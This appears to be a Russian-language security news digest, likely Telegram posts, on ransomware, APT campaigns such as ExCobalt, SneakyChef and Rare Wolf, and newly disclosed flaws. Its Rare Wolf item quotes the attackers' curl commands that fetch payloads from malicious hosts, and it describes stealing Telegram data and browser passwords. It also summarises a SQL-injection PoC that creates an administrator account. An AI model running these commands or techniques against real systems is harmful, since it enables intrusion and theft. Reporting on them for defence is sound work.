͏Срочно в номер! Корабли лавировали, лавировали, да не вылавировали!

В смысле LockBit мочили, мочили, да не замочили. Объявленая несколько месяцев назад побежденной эта групировка RaaS не только отживела и снова стала ведущей бандой вымогателей в мире, но и ухитрилась распотрошить Федеральную резервную систему США (она же ФРС, она же The Fed, она же Центробанк США, она же главный и единственный станок по печати американских долларов).

И вынести оттуда 33 ТБ данных. Которые грозится опубликовать уже 25 июня.

Такого громкого взлома от рансомварщиков, пожалуй, еще не было. Интересно, заплатят или нет?

Исследователи Positive Technologies сообщают об активизации ExCobalt на российском направлении с помощью нового бэкдора GoRed на базе Golang.

Группировка ExCobalt сосредоточена на кибершпионаже и включает в себя несколько участников, действующих как минимум с 2016 года, из числа, предположительно, бывших членов банды Cobalt.

Cobalt атаковал финансовые учреждения с целью кражи средств, отличаясь задействованием инструмента CobInt, который последователи начали применять в 2022 году.

За последний год предпринятые злоумышленником в отношении РФ атаки были нацелены на различные сектора, включая госуправление, информационные технологии, металлургию, горнодобывающую промышленность и телекоммуникации.

Первоначальный доступ к средам реализуется через скомпрометированного подрядчика и атак на цепочку поставок, что отражает высокую степень сложности планируемых кампаний.

Методология работы ExCobalt предполагает использование различных инструментов, таких как Metasploit, Mimikatz, ProcDump, SMBExec, Spark RAT для выполнения команд на зараженных хостах, а также EoP-эксплойтов для Linux (CVE-2019-13272, CVE-2021-3156, CVE-2021- 4034 и CVE-2022-2586).

Претерпевший многочисленные изменения с момента своего создания GoRed представляет собой комплексный бэкдор, который позволяет операторам выполнять команды, собирать учетные данные и подробную информацию об активных процессах, сетевых интерфейсах и файловых системах.

Он использует протокол удаленного вызова процедур RPC для связи с C2.

Более того, он поддерживает ряд фоновых команд для поиска интересующих файлов и паролей, а также включения обратной оболочки. Собранные данные затем экспортируются в инфраструктуру, подконтрольную злоумышленнику.

ExCobalt продолжает демонстрировать высокий уровень активности в атаках на российские компании, постоянно добавляя в свой арсенал новые инструменты и совершенствуя методы.

При этом GoRed приобретает все новые возможности и функции по сбору данных жертвы, повышая скрытность как внутри зараженной системы, так и при взаимодействии с C2.

Кроме того, ExCobalt проявляет гибкость и универсальность, дополняя свой набор инструментов модифицированными стандартными утилитами, которые помогают группе легко обходить защиту и адаптироваться к ее изменениям, показывая глубокое понимание слабых сторон жертвы.

Securonix раскрывает незамысловатую фишинговую кампанию, нацеленную на Пакистан с использованием специального бэкдора.

Неизвестные злоумышленники получили название и отслеживаются ресерчерами как PHANTOM#SPIKE. Они использовали фишинговые документы на военную тематику для активации цепочки заражения.

Для развертывания вредоносного ПО PHANTOM#SPIKE использовали ZIP-файлы с защищенным паролем архивом полезной нагрузки.

Сама же замеченная кампания отличается отсутствием сложности и задействованием достаточно простых полезных данных для достижения удаленного доступа к целевым машинам.

Причем прилагаемый к сообщениям ZIP-архив якобы представляет собой протокол заседания, связанного с Международным форумом Армия-2024, который традиционно проводится Министерством обороны РФ.

В ZIP-файле присутствует скомпилированный Microsoft HTML-файл справки (CHM) и скрытый исполняемый файл (RuntimeIndexer.exe).

Первый из них при открытии отображает протокол собрания, а также пару изображений. Но при этом как только пользователь щелкнет в любом месте документа, скрытно запускается двоичный файл.

Исполняемый файл предназначен для работы в качестве бэкдора, который устанавливает соединения с удаленным сервером через TCP для получения команд, которые впоследствии выполняются на скомпрометированном хосте.

Помимо передачи системной информации, выполняет команды через cmd.exe, собирает выходные данные операции и передает их обратно на сервер.

Реализует такие команды, как systeminfo, Tasklist, Curl для извлечения общедоступного IP-адреса с помощью ip-api[.]com и schtasks для настройки постоянства.

Бэкдор по сути функционирует как троян удаленного доступа (RAT) на основе командной строки, который предоставляет злоумышленнику постоянный, скрытый и безопасный доступ к зараженной системе.

Возможность удаленно выполнять команды и передавать результаты обратно на C2 позволяет злоумышленнику контролировать зараженную систему, красть конфиденциальную информацию и доставлять дополнительные полезные нагрузки.

Исследователи Cisco Talos сообщают об обнаружении масштабной шпионской кампании в отношении правительственных учреждений в Европе, Африке, Азии и на Ближнем Востоке, которую они приписывают неизвестной китайской APT SneakyChef.

Китайские хакеры активны как минимум с августа 2023 года и задействуют SpiceRAT и SugarGh0st, а также приманки в виде сканов документы правительственных учреждений, большинство из которых связаны с министерствами иностранных дел или посольствами различных стран.

Впервые активность APT была освещена еще в конце ноября 2023 года в связи с серией атак на Южную Корею и Узбекистан с использованием специального варианта Gh0st RAT под названием SugarGh0st.

Кроме того, про использование SugarGh0st RAT в отношении американских компаний в области ИИ и научных учреждений также сообщала Proofpoint в прошлом месяце, отлеживая кластер угроз как UNK_SweetSpecter.

Отдельно следует упомянуть, что SneakyChef ресерчерами также увязывается со кампанией Operation Diplomatic Spectre, которую подробно анализировала Palo Alto Networks Unit 42.

С тех пор Talos наблюдала, как одно и то же вредоносное ПО использовалось для атаки на различные правительственные учреждения в Анголе, Индии, Латвии, Саудовской Аравии и Туркменистане с использованием целевых фишинговых рассылок.

Помимо использования цепочек атак с файлами LNK, встроенными в архивы RAR, для доставки SugarGh0st, новая волна задействует самораспаковывающийся архив RAR (SFX) в качестве начального вектора заражения для запуска VBS, который в конечном итоге запускает вредоносное ПО с помощью загрузчика и одновременно отображает файл-приманку.

При этом атаки на Анголу отметились тем, что в них применялся новый троян удаленного доступа под названием SpiceRAT, а качестве приманки - русскоязычная газета Нейтральный Туркменистан.

SpiceRAT, в свою очередь, использует для распространения две разные цепочки заражения, одна из которых - это файл LNK, присутствующий в архиве RAR, который развертывает вредоносное ПО с использованием методов боковой загрузки DLL.

Второй вариант предполагает использование HTML-приложения (HTA), которое реализует пакетный сценарий Windows и двоичный файл загрузчика в кодировке Base64.

Пакетный сценарий также предназначен и для запуска другого исполняемого файла ChromeDriver.exe каждые 10 минут, который загружает вредоносную DLL, которая, в свою очередь, доставляет SpiceRAT. Каждый из этих компонентов — ChromeDriver.exe, DLL и полезная нагрузка RAT — извлекаются из ZIP-архива, полученного двоичным файлом загрузчика с удаленного сервера.

SpiceRAT также использует технику боковой загрузки DLL для запуска загрузчика DLL, который записывает список запущенных процессов, чтобы проверить, отлаживается ли он, с последующим запуском основного модуля из памяти.

Благодаря возможности загружать и запускать исполняемые двоичные файлы и произвольные команды SpiceRAT значительно увеличивает поверхность атаки на сеть жертвы, открывая путь для дальнейших атак.

Индикаторы компрометации, связанные с этой угрозой, можно найти здесь. 

Новый метод выполнения команд, получивший название GrimResource, использует специально созданную MSC (Microsoft Saved Console) и неисправленный недостаток Windows XSS для выполнения кода через консоль управления Microsoft.

В июле 2022 года Microsoft по умолчанию отключила макросы в Office, что заставило злоумышленников экспериментировать с новыми типами файлов при фишинговых атаках.

Злоумышленники сначала переключились на образы ISO и ZIP-файлы, защищенные паролем, поскольку это позволяло обходить флаги Mark of the Web (MoTW).

После того, как Microsoft исправила эту проблему с ISO, а 7-Zip добавил возможность распространять флаги MoTW, злоумышленники были вынуждены переключиться на новые вложения - ярлыки Windows и файлы OneNote.

Теперь же они теперь перешли на новый тип файлов — файлы Windows MSC (.msc), которые используются в консоли управления Microsoft (MMC) для управления различными аспектами ОС или создания пользовательских представлений часто используемых инструментов.

Впервые злоупотребления файлами MSC для развертывания вредоносного ПО сообщила южнокорейская Genian. Затем к ним присоединась Elastic.

Исследователи обнаружили новый метод распространения MSC и злоупотребление старой, но не исправленной уязвимостью Windows XSS (даже в последней версии Windows 11) в apds.dll, которая позволяет выполнять произвольный код JavaScript через созданный URL-адрес.

Об уязвимости было сообщено Adobe и Microsoft в октябре 2018 года, и даже после расследования, Microsoft определила, что данный случай не соответствует критериям немедленного (и вообще) устранения.

Вредоносный файл MSC содержит ссылку на уязвимый ресурс APDS в разделе StringTable, поэтому, когда цель открывает его, MMC обрабатывает его и запускает выполнение JS в контексте «mmc.exe».

Уязвимость XSS можно объединить с методом DotNetToJScript для выполнения произвольного кода .NET через движок JavaScript в обход любых существующих мер безопасности.

Причем Elastic нашла образец («sccm-updater.msc»), использующий GrimResource, который был загружен на VirusTotal 6 июня 2024 года.

Так что, судя по всему метод активно используется в реальных условиях. Что еще хуже, ни один антивирусный механизм VirusTotal в итоге не пометил его как вредоносный.

Несмотря на то, что именно в этой кампании метод используется для развертывания Cobalt Strike и первоначального доступа к сетям, его также можно задействовать для выполнения других команд.

Elastic Security опубликовала полный список индикаторов GrimResource на GitHub и предоставила правила YARA для обнаружения подозрительных файлов MSC.

Исследователи BI.ZONE сообщают о новой кампании со стороны группировки Rare Wolf, связанной с распространением легитимного ПО для удаленного контроля деятельности сотрудника на рабочем месте Mipko Employee Monitor.

Как выяснили исследователи, в начале июня ненадеванная жертва получила фишинговое электронное письмо, во вложении к которому находился исполняемый файл в виде документа с тактико-техническими требованиями Проект ТТТ 26.2024.scr.

При его запуске происходила компрометация целевой машины пока пользователь лицезрел «ожидаемый» отвлекающий документ.

В реальности с удаленного сервера загружались архивы с дополнительными инструментами:
- C:\Intel\curl.exe -o C:\Intel\keys.rar hxxp://hostingforme[.]nl/down/keys.rar
- C:\Intel\curl.exe -o C:\Intel\MPK.rar hxxp://hostingforme[.]nl/down/MPK.rar
- C:\Intel\curl.exe -o C:\Intel\pas.rar hxxp://hostingforme[.]nl/down/pas.rar

Затем загружался исполняемый файл, который расшифровывал полученные архивы: C:\Intel\curl.exe -o C:\Intel\driver.exe hxxp://supersuit[.]site/down/driver.exe.

На подконтрольную злоумышленником почту посредством программы Blat отправлялись файлы, имена которых подходили под маски *.doc*, *.pdf*, а также все файлы из папки AppData\Roaming\Telegram Desktop\tdata.

Производился сбор паролей из браузеров в текстовый файл password.txt, далее он также отправлялся на почту злоумышленника.

И, наконец, устанавливалось ПО Mipko Employee Monitor, позволяющее злоумышленнику взаимодействовать со скомпрометированной системой, в том числе закрепляться через ветку реестра Software\Microsoft\Windows\CurrentVersion\Run.

Подробно о группировке Rare Wolf исследователи сообщали в отчете от ноября 2023 года, где представлены необходимые IoC, а также MITRE ATT&CK.

͏Некто Cas на одной известной площадке, предположительно, располагает 0-Day UAF в ядре Linux, который можно использовать для выполнения привилегированного кода в версии 6.6.15-amd64.

Сие хакерское удовольствие доступно по цене в 150 тысяч долларов США в расчете на Monero или BTC. Обращаться следует при наличии соответствующего депозита.

Никакой дополнительной контактной информации не предоставлено, но посредником выступает никто иной как IntelBroker.

Ресерчеры из Лаборатории Касперского выкатила новый отчет из серии исследований в отношении резонансного инцидента с бэкдором в бэкдора в XZ Utils.

В первой части была подробна изучена хронология и представлен общий анализ бэкдора, основное внимание во второй уделялось изощрённым социнженерным аспектам инцидента.

В новом исследовании ЛК детально изучен перехватчик функций, используемых в OpenSSH, обнаружив в нём несколько новаторских решений.

Злоумышленник установил функцию предотвращения повторного воспроизведения (anti-replay), чтобы избежать возможного перехвата бэкдора или связи.

Разработчик бэкдора XZ Utils применил специальную технику стеганографии в коде x86, чтобы скрыть прямо в коде открытый ключ шифрования, по технологии, схожей с ROP.

Бэкдор скрывает журналы несанкционированных подключений к SSH-серверу, подключая функцию журналирования.

Бэкдор перехватывает функцию аутентификации по паролю, что позволяет злоумышленнику использовать любое имя пользователя и пароль для входа на зараженный сервер без каких-либо дополнительных проверок.

Аналогичное реализуется и для аутентификации с открытым ключом.

Кроме того, он обладает возможностями удаленного выполнения кода, которые позволяют злоумышленнику выполнить любую системную команду на зараженном сервере.

В целом, можно сделать вывод, что бэкдор XZ Utils действительно весьма сложная и уникальная угроза со множеством особенностей и весьма непростой долгоиграющей кампанией социнженерии.

При этом группа или злоумышленник, стоящий за ней, обладает обширными знаниями внутреннего устройства проектов с открытым исходным кодом, таких как SSH и libc, а также серьезным опытом в обфускации кода для запуска заражения.

͏Можно сказать, любой патч от Microsoft

Подведем итоги нашего бесплатного курса "OSINT для новичков". В рамках курса были изучены фундаментальные основы поиска по открытым источникам (Open-Source Intelligence) и инструменты для автоматизации этого процесса. Также были рассмотрены специальные сервисы для сбора данных, часть из которых уже достаточно известна в кругах специалистов, а часть знакома лишь единицам и стремительно набирает популярность. Этот курс поможет вам понять важность защиты данных и конфиденциальности.

Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:

Первая серия материалов - "Введение в OSINT":
• Введение в OSINT
• Стороны, заинтересованные в OSINT информации
• Типы сбора информации
• Преимущества и проблемы OSINT
• Правовые и этические ограничения
• Цифровой след
• Google Dorking

Вторая серия материалов - "OSINT инструменты":
• Хакерские поисковые системы.
• OSINT на платформе Telegram.
• OSINT: theHarvester и HaveIbeenPwned.
• OSINT: Snoop, GHunt, ReconSpider.
• OSINT: Поиск по фото.
• Инструменты для OSINT в VKontakte и YouTube.
• OSINT: Отслеживание транспорта

Не забывайте делиться нашим бесплатным курсом "OSINT для новичков"!

P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас:
• OSINT подборка №1
• OSINT подборка №2
• OSINT подборка №3

P.P.S.: Ещё немного полезного по теме OSINT:
• OSINT collection.
• Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц.
• Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел.
• Как «пробить» человека в Интернете: используем операторы Google и логику
• Red Team Trickery.
• История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.

Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.

#OSINT #обучениеOSINT #статья

LH | Новости | Курсы | Мемы

͏LockBit сдержала обещание и опубликовала анонсированные украденные у Федеральной резервной системы США данные после провала переговоров, в ходе которым им предложили 50 000 долларов в качестве выкупа.

Банда разместила 21 ссылку с файлами, по-видимому, родительских каталогов, торренты и сжатые архивные файлы, которые, как оказалось, принадлежат одному из финансовых учреждений США - volve Bank and Trust.

Ипотечный кредитор со штаб-квартирой в Мемфисе, штат Теннесси, обслуживает частных лиц и малый бизнес как минимум в 17 штатах, его активы в 2022 году составили 1,3 миллиарда долларов.

Evolve также известна своим открытым банковским партнерством с финтех-платформами Mastercard, Visa, Affirm, Melio, Stripe и Airwallex.

Совсем недавно банк и его материнская компания Evolve Bancorp Inc. подверглись рестрикциям ФРС за финансовые нарушения и за участие в небезопасной банковской деятельности.

Вполне веротяно, что Акела промахнулся или банда провернулся мощны пиар-трюк, но как бы то ни было - с момента появления ФРС на DLS ситуация никак не комментировалась представителями структуры до настоящего времени, что подозрительно.

Так что в любом случае, будем посмотреть.

Apple выпустила обновление прошивки для AirPods с исправлением уязвимости, которая позволяет получить несанкционированный доступ к наушникам.

Проблема аутентификации, отслеживаемая как CVE-2024-27867, затрагивает AirPods (2-го поколения и новее), AirPods Pro (все модели), AirPods Max, Powerbeats Pro и Beats Fit Pro.

Как поясняют в Apple, когда наушники отправляют запрос на подключение к одному из ранее сопряженных устройств, злоумышленник в радиусе действия Bluetooth может подделать предполагаемое исходное устройство и получить доступ к наушникам.

Другими словами, противник, находящийся в физической близости, может использовать уязвимость для прослушивания переговоров.

Обнаружение и раскрытие приписывают исследователю Йонасу Дресслеру, проблема решена путем улучшения управления состоянием в рамках обновления прошивки AirPods 6A326, AirPods 6F8 и Beats 6F8.

Исследователи сообщают о начавшейся эксплуатации недавно исправленной критической CVE-2024-5806 в MOVEit Transfer.

Буквально на неделе Progress Software анонсировала исправления для двух критических уязвимостей обхода аутентификации CVE-2024-5805 и CVE-2024-5806, затрагивающих MOVEit Transfer.

Обе описываются как проблемы неправильной аутентификации в SFTP-модуле продукта MOVEit Transfer.

CVE-2024-5806 исправлен вместе с выпуском MOVEit Transfer версий 2023.0.11, 2023.1.6 и 2024.0.2. CVE-2024-5805 влияет только на версию 2024.0.0 и исправлена в выпуске версии 2024.0.1. 

Причем в своих рекомендациях по CVE-2024-5806 Progress отметила, что недавно выявленная уязвимость стороннего компонента повышает риск этой CVE. Компания поделилась мерами смягчения, пока не станет доступен патч.

В свою очередь, WatchTowr обнародовала технические подробности для CVE-2024-5806 и продемонстрировала, как ее использовать для получения доступа к уязвимой системе.

Кроме того, WatchTowr также расчехляла и вторую уязвимость, которая затрагивает библиотеку сервера IPWorks SSH, используемую MOVEit Transfer.

Библиотека подвержена уязвимости принудительной аутентификации, которая, вероятно, затрагивает все использующие ее приложения, что потенциально позволяет добиться полного взлома системы.

Вскоре после того, как подробности были обнародованы Shadowserver Foundation сообщила о попытках эксплуатации CVE-2024-5806.

Однако Rapid7 отметила в своем блоге, что несмотря на фиксацию Shadowserver попыток взлома в своих ловушках, активность ловушек не всегда коррелирует с активностью угроз в реальных производственных средах.

Тем не менее, Shadowserver сообщает, что около 1700 экземпляров MOVEit Transfer доступны в Интернете, большинство из которых находятся в Северной Америке.

А по данным Censys их насчитывается 2700, большинство из которых также находятся в США, далее следуют Великобритания и Германия.

И это число, как отмечают исследователи, соответствует количеству жертв предыдущего инцидента с Cl0p. Совпадение?

Исследователи из SEC Consult предупреждают, что уязвимости Siemens Sicam могут быть применены в реальных атаках на энергетический сектор

В мае Siemens выпустила обновления для удаленного терминала Sicam A8000, сетевых датчиков Sicam EGS и ПО автоматизации электропитания Sicam 8, которые устраняют два недостатка высокой степени серьезности и один средней.

Одна из них, CVE-2024-31484, представляет собой проблему переполнения буфера, которую можно использовать для чтения конфиденциальных данных из памяти, что может привести к RCE в контексте текущего процесса или состоянию DoS.

Вторая CVE-2024-31485 связана с внедрением команд в веб-интерфейс продуктов и позволяет злоумышленнику перехватывать имя пользователя и пароль с повышенными привилегиями, позволяя выполнять произвольный код от имени пользователя root.

Третья проблема, CVE-2024-31486, связана с неправильной защитой паролей клиентов MQTT, что позволяет злоумышленнику, имеющему физический или удаленный доступ к оболочке, получить учетные данные.

В июньском сообщении промышленный гигант сообщил клиентам, что CVE-2024-31484 также влияет и на устройства SICAM AK3/TM/BC.

Затронутые продукты — это решения для электросетей, обеспечивающие автоматизацию подстанций.

В свою очередь, SEC Consult, которой приписывают обнаружение этих уязвимостей, в среду представила подробное описание для каждой из уязвимостей, пояснив также, как злоумышленники могут использовать выявленные уязвимости в реальной атаке.

Злоумышленнику необходимо сначала получить доступ на уровне сети к порту 443/80, чтобы взаимодействовать с целью.

Злоупотребляя CVE-2024-31484, атакующий может утечь информацию из сегмента глобальной памяти, что может способствовать дальнейшим атакам.

Кроме того, если злоумышленнику удалось получить учетную запись с низким уровнем привилегий для SICAM-WEB, возможно задействовать CVE-2024-31485 для кражи пароля администратора.

Переключившись на его учетную запись, злоумышленник может перенастроить ПЛК и тем самым дестабилизировать подстанцию.

Так что все пароли следует изменить после исправления уязвимости, поскольку их конфиденциальность теперь не может быть гарантирована.

Исследователи F.A.C.C.T. сообщают о новой группе ReaverBits, нацеленной на российские компании посредством вредоносных рассылок от имени компаний и министерств.

К настоящему времени удалось задетектить около пяти рассылкок группы, две из которых были в декабре 2023 года, еще две - в январе 2024 года, а последняя - в мае.

Атаки были направлены на федеральный фонд, а также российские компании из сферы ритейла, телекоммуникаций, процессинга, агропромышленного комплекса.

Наименование обусловлено тем, что атакующие похищали конфиденциальные данные с помощью шпионского ПО MetaStealer, отсюда «reaver» (в переводе «вор»), а «bits» – из-за использования в URL-адресах «bitbucket» и «bitrix».

Группа активно полагается на спуфинг, в качестве нагрузки использует уже названный MetaStealer.

В одной из атак группа применяла загрузчик LuckyDownloader, предположительно, воспользовавшись услугой стороннего актора, отслеживаемого по имени LuckyBogdan.

Технические подробности каждой из атак ReaverBits, включая IoC и MITRE ATT&CK, - в отчете.

Fortra предупреждает о критической уязвимости FileCatalyst Workflow SQLi, для которой уже доступен PoC.

Решение FileCatalyst Workflow с поддержкой объемных файлов
используется организациями по всему миру для ускорения передачи данных и совместной работы в частных облачных пространствах.

CVE-2024-5276 (CVSS v3.1:9.8) была обнаружена исследователями Tenable 15 мая 2024 года и позволяет злоумышленникам, не прошедшим проверку подлинности, создавать пользователей-администраторов и манипулировать данными в базе приложения.

Уязвимость затрагивает FileCatalyst Workflow 5.1.6 (сборка 135 и более ранние версии), необходимые исправления включены в FileCatalyst Workflow 5.1.6 (сборка 139).

При этом эксплойт без аутентификации также требует, чтобы на целевом экземпляре был включен анонимный доступ. В противном случае для использования CVE-2024-5276 потребуется аутентификация.

Tenable впервые сообщила о проблеме Fortra 22 мая, одновременно представив PoC-эксплойт, который выкатила в паблик сразу вслед за публикацией бюллетеня по безопасности Fortra

Эксплойт демонстрирует, как анонимный удаленный злоумышленник может выполнить SQL-инъекцию через параметр jobID в различных конечных точках URL-адресов веб-приложения Workflow.

Проблема в том, что метод findJob использует предоставленный пользователем идентификатор задания без очистки входных данных для формирования предложения WHERE в запросе SQL, что позволяет злоумышленнику вставить вредоносный код.

Скрипт Tenable анонимно входит в приложение FileCatalyst Workflow и выполняет SQL-инъекцию через параметр jobID, чтобы добавить нового пользователя-администратора (operator) с известным паролем (password123).

В конце концов он получает токен и использует вновь созданные учетные данные администратора для входа в уязвимую конечную точку.

Несмотря на то, что сообщений об активном использовании этой проблемы еще не поступало, появление работающего PoC быстро изменит ситуацию. Можно не сомневаться, операторы Clop уже тестируют новую игрушку.

Ресерчеры из Лаборатории Касперского явно перешли в информационное наступление и представили новый отчет, с которым определенно следует ознакомиться руководителям малых и средних компаний для понимания и оценки современных киберугроз.

Дело в том, что малый и средний бизнес все чаще становится целью атак злоумышленников, что обусловлено, прежде всего, пренебрежением надежными мерами кибербезопасности в виду ограниченных ресурсов и нехватки знаний.

Причем финансовый ущерб от утечек данных может оказаться для них непосильным, что подчеркивает важность превентивных мер. Особенно, если учитывать, что это устойчивая тенденция, которая продолжает представлять постоянную угрозу для бизнеса.

В связи с чем, ресерчеры Лаборатории с помощью Kaspersky Security Network (KSN) и подготовили анализ угроз 2024 года для малого и среднего бизнеса, оснастив его примерами реальных атак.

По данным ЛК, с начала года с вредоносным и нежелательным ПО, скрытым в программах для малого и среднего бизнеса или имитирующим их, столкнулись 2402 пользователя.

Всего под видом такого ПО распространялось 4110 уникальных файлов. Это на 8% больше по сравнению с аналогичным периодом 2023 года, что свидетельствует о росте активности злоумышленников.

Наиболее заметный рост атак с использованием файлов, имитирующих легитимное ПО, наблюдался для Microsoft Excel.

При этом общее количество заражений в секторе малого и среднего бизнеса составило 138 046 по сравнению со 131 219 случаями за тот же период 2023 года - рост более чем на 5%.

Самой распространенной киберугрозой остаются атаки троянцев. Злоумышленники по-прежнему целенаправленно атакуют малые и средние компании, предпочитая зловредное ПО нежелательным программам.

В отчете ЛК приведены конкретные примеры с использованием фишинга, взломом соцсетей и спамом, а также конкретные рекомендации по по киберзащите.

Исследователи Claroty сообщают о серьезных последствиях взлома газового хроматографа Emerson с использованием вновь обнаруженных критических уязвимостей.

Газовый хроматограф - это по сути химический анализатор, который реализует измерение содержания различных компонентов в образце и зачастую используются в больницах для анализов крови, а также в сфере экологического контроля загрязнений воздуха.

Как правило, устройства газовой хроматографии Emerson подключаются к внутренним сетям и контролируются техническими специалистами удаленно по каналу связи, использующему собственный протокол. 

Claroty в своем исследовании сосредоточились на Emerson Rosemount 370XA, который ресерчеры смогли полностью смоделировать и оттестить.

Анализ показал, и позже Emerson подтвердила, что продукты Rosemount GC370XA, GC700XA и GC1500XA подвержены четырем уязвимостям.

Список включает в себя критическую инъекцию команд, которая позволяет неаутентифицированному злоумышленнику с доступом к сети удаленно выполнять произвольные команды с привилегиями root.

Кроме того, имелась проблема высокой серьезности, которая позволяет неаутентифицированному сетевому злоумышленнику обойти аутентификацию и получить возможности администратора.

Остальные уязвимости отнесены к категории средней степени серьезности.

Один из них позволяет злоумышленнику, не прошедшему аутентификацию, получить конфиденциальную информацию или DoS, а другой - злоумышленнику, прошедшему аутентификацию, выполнять произвольные команды.

Компрометация таких устройств может оказать существенное влияние в различных отраслях.

Так, при производстве продуктов питания атаки на газовые хроматографы могут повлиять на обнаружение бактерий и привести к остановке технологической цепочки.

Подобные же атаки на больничные хроматографы могут исказить результаты анализов крови и других образцов пациентов.

Emerson проинформировала клиентов о доступности обновлений прошивки, которые должны были устранить уязвимости, а также рекомендовала изолировать уязвимый продукт от Интернета в соответствии с лучшими отраслевыми практиками.